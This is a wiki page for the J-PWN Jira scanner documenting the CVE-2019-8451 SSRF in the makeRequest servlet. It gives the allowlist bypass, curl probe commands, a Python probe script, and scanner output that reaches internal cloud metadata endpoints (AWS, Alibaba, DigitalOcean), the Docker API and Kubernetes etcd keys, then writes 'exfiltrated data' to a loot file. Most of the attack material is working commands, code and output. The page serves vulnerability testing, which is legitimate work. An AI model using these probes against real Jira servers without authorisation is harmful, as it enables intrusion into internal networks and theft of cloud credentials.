CVE‐2019‐8451 - carnal0wnage/J-PWN GitHub Wiki
Category: [SSRF]
[CG] The secret sauce for this is needing to add the X-Atlassian-Token: no-check header (the Atlassian header that bypasses the XSRF check) and dropping the http(s) after the @ symbol: the inner URL is http://JIRAHOST:PORT@example.com, not http://JIRAHOST:PORT@http://example.com. The Jira host:port in front of the @ is what the allowlist check sees, while the fetch actually goes to the host after it.
module name: check_cve_2019_8451
url: plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:8080@example.com
VULN
INFO: Checking for CVE-2019-8451 (SSRF)
[Testing URL]: http://JIRAJIRA:8080/plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:8080@example.com
[!!] [SSRF] Vulnerable to CVE-2019-8451 (SSRF): http://JIRAJIRA:8080/plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:8080@example.com
Checking AWS Metadata
----> AWS Metadata Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]/latest/meta-data/":{"rc":500,"headers":{},"body":""}}
Checking Alibaba Metadata
----> Alibaba Metadata Found: http://JIRAJIRA:8080/plugins/servlet/gadgets/makeRequest?url=http://JIRAJIRA:[email protected]/latest/meta-data/
Checking Docker Containers
----> Docker Containers Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]:2375/v1.24/containers/json":{"rc":500,"headers":{},"body":""}}
Checking Kubernetes ETCD API keys
----> Kubernetes ETCD API keys Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]:2379/v2/keys/?recursive=true":{"rc":500,"headers":{},"body":""}}
Checking Digital Ocean Metadata
----> Digital Ocean Metadata Not Found HTTP:500
----> HTTP Code: 200
throw 1; < don't be evil' >{"http://JIRAJIRA:[email protected]/metadata/v1.json":{"rc":500,"headers":{},"body":""}}
Exfiltrated data written to: loot/CVE-2019-8451_JIRAJIRA:8080.txt
NOT VULN
INFO: Checking for CVE-2019-8451 (SSRF)
[Testing URL]: https://JIRASERVER/jira/plugins/servlet/gadgets/makeRequest?url=https://JIRASERVER:443@example.com
- Not Vulnerable to CVE-2019-8451
- HTTP Code: 200
- Response Body (helpful to debug): throw 1; < don't be evil' >{"https://JIRASERVER/[email protected]":{"rc":403,"headers":{},"body":"Requests to https://JIRASERVER/[email protected] are not allowed. See your administrator about configuring a whitelist entry for this destination (http://confluence.atlassian.com/x/KQfCDQ )."}}
INFO: Checking for CVE-2019-8451 (SSRF)
[Testing URL]: https://JIRA:443/plugins/servlet/gadgets/makeRequest?url=https://JIRA:443@example.com
- Not Vulnerable to CVE-2019-8451
- HTTP Code: 200
curl -k -v 'https://JIRA:443/plugins/servlet/gadgets/makeRequest?url=https://JIRA:443@example.com' -H $'X-Atlassian-token:no-check'
* Request completely sent off
< HTTP/1.1 200
< X-AREQUESTID: 103x20173075x2
< X-ASEN: SEN-9594476
< Set-Cookie: atlassian.xsrf.token=BT7X-UFIE-023N-5LRQ|9f59b3cbfc16d06f4d68ee0a9b6c0b33a1894dcf|lout;path=/
< X-AUSERNAME: anonymous
< X-Content-Type-Options: nosniff
< Expires: Mon, 06 Jan 2025 01:43:42 GMT
< Cache-Control: public,max-age=3600
< Content-Disposition: attachment;filename=p.txt
< Content-Type: application/json;charset=UTF-8
< Content-Length: 102
< Date: Mon, 06 Jan 2025 00:43:42 GMT
< Set-Cookie: BIGipServerjira-ng-pub.app~jira-ng-pub_pool=REMOVED; path=/; Httponly; Secure
< Vary: Accept-Encoding
<
* Connection #0 to host JIRA left intact
throw 1; < don't be evil' >{"https://JIRA:443@example.com":{"rc":500,"headers":{},"body":""}}
Curl string to check
curl -k -v 'http://IP_OR_HOSTNAME:8080/plugins/servlet/gadgets/makeRequest?url=http://IP_OR_HOSTNAME:8080@example.com' -H $'X-Atlassian-token:no-check'
We are looking for {"rc":200,"headers":{},"body":"<!doctype html>\n<html>\n<head>\n <title>Example Domain<\/title>\
in the returned text, i.e. the example.com page proxied back inside the JSON. The outer HTTP status is 200 in every case above (Jira only wraps the proxied result in JSON behind the throw 1; < don't be evil' > guard), so go by the inner rc and body, not the status line. An inner rc of 403 with the "Requests to ... are not allowed. See your administrator about configuring a whitelist entry" message (first NOT VULN example above) means the allowlist rejected the destination. An inner rc of 500 with an empty body (second NOT VULN example) means the allowlist message is absent but the fetch failed; the vulnerable host above returned the same rc 500 for unreachable internal targets, so treat that result as inconclusive rather than patched and retest against an internal target or a host you control.
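As an added example (not J-PWN's own code) of turning the curl check above into something scriptable: it builds the probe URL from a Jira base URL, sends it with the XSRF-bypass header, strips Jira's throw 1; < don't be evil' > guard and classifies the inner rc/body the way the prose above does (rc 200 with the example.com title, rc 403 with the allowlist message, anything else inconclusive). The function names build_probe_url, classify and probe are mine, and the sample responses are constructed from the output shown on this page.

```python
"""CVE-2019-8451 makeRequest SSRF probe builder and response classifier (added example)."""
import json
import urllib.parse
import urllib.request

# Atlassian prefixes every makeRequest reply with this anti-JSON-hijacking guard.
GUARD = "throw 1; < don't be evil' >"
# Title of the example.com landing page; seeing it in the proxied body proves the fetch.
MARKER = "<title>Example Domain</title>"
# Fragment of the message Jira returns when the URL allowlist rejects the destination.
ALLOWLIST_MSG = "are not allowed"


def build_probe_url(jira_base, target="example.com"):
    """Build the probe for a Jira base URL such as http://JIRAJIRA:8080 or
    https://JIRASERVER/jira (context path kept). The inner URL is
    <scheme>://<jira host:port>@<target> with no scheme after the '@'."""
    parts = urllib.parse.urlsplit(jira_base)
    hostport = parts.netloc  # keep the host exactly as given (urlsplit.hostname lowercases it)
    if ":" not in hostport:
        hostport = f"{hostport}:{443 if parts.scheme == 'https' else 80}"
    inner = f"{parts.scheme}://{hostport}@{target}"
    return f"{jira_base.rstrip('/')}/plugins/servlet/gadgets/makeRequest?url={inner}"


def parse_makerequest(text):
    """Strip the guard and return (requested_url, inner_rc, inner_body)."""
    if not text.startswith(GUARD):
        raise ValueError("not a makeRequest response")
    payload = json.loads(text[len(GUARD):])
    (url, result), = payload.items()  # exactly one entry: the URL that was fetched
    return url, int(result["rc"]), result.get("body", "")


def classify(text):
    """vulnerable | blocked_by_allowlist | inconclusive | not_makerequest."""
    try:
        _, rc, body = parse_makerequest(text)
    except (ValueError, KeyError, TypeError):
        return "not_makerequest"
    if rc == 200 and MARKER in body:
        return "vulnerable"
    if rc == 403 and ALLOWLIST_MSG in body:
        return "blocked_by_allowlist"
    # rc 500 with an empty body: allowlist did not reject it but the fetch failed.
    return "inconclusive"


def probe(jira_base, timeout=10):
    """Send the probe with the XSRF-bypass header and classify the reply (needs network)."""
    req = urllib.request.Request(build_probe_url(jira_base),
                                 headers={"X-Atlassian-Token": "no-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify(resp.read().decode("utf-8", "replace"))


# Constructed sample replies, modelled on the output shown on this page.
SAMPLE_VULN = GUARD + r'{"http://JIRAJIRA:8080@example.com":{"rc":200,"headers":{},"body":"<!doctype html>\n<html>\n<head>\n    <title>Example Domain<\/title>\n</head>\n</html>"}}'
SAMPLE_BLOCKED = GUARD + r'{"https://JIRASERVER:443@example.com":{"rc":403,"headers":{},"body":"Requests to https://JIRASERVER:443@example.com are not allowed. See your administrator about configuring a whitelist entry for this destination (http://confluence.atlassian.com/x/KQfCDQ )."}}'
SAMPLE_INCONCLUSIVE = GUARD + r'{"https://JIRA:443@example.com":{"rc":500,"headers":{},"body":""}}'

if __name__ == "__main__":
    print(build_probe_url("http://JIRAJIRA:8080"))
    for name, sample in [("vuln host", SAMPLE_VULN), ("allowlist enforced", SAMPLE_BLOCKED),
                         ("egress failed", SAMPLE_INCONCLUSIVE)]:
        print(f"{name}: {classify(sample)}")
```

probe() is the only function that touches the network; everything else runs offline, which is also how you would unit-test a scanner module against captured responses before pointing it at a target.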
Description
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
Important Note: The patch is deployed in fix versions and later by configuring the Jira URL allowlist. N.B.: The allowlist is enabled by default (without any URLs defined). However, the fixed versions will be vulnerable if the allowlist is disabled by the administrator, so a version number alone does not prove a host is safe; send the probe.
References: